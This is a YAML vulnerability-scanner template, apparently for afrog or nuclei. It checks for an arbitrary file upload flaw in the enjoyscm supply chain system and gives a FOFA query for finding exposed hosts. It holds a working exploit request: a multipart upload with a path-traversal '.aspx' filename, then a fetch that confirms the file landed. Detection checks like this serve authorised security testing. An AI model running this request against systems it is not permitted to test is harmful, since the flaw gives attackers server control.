id: enjoyscm-file-upload

info:
  name: enjoyscm UploadFile任意文件上传
  author: zan8in
  severity: high
  description: |
    enjoyscm是国内部分超市使用的一种供应链管理系统。enjoyscm UploadFile参数存在 任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。
    fofa：title="供应商网上服务厅"


variables:
  rboundary: "{{rand_base(8)}}"
  randstr: "{{rand_base(5)}}"
  randbody: "{{rand_base(28)}}"

http:
  - raw:
      - |
        POST /File/UploadFile HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}

        --WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="file"; filename="../../../{{randstr}}.aspx"
        Content-Type: image/jpeg
        
        {{randbody}}
        --WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="action"
        
        unloadfile
        --WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="filepath"


        --WebKitFormBoundary{{rboundary}}--

        
      - |
        GET /{{randstr}}.aspx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200
          - status_code_2 == 200 && contains(body_2,"{{randbody}}")
        condition: and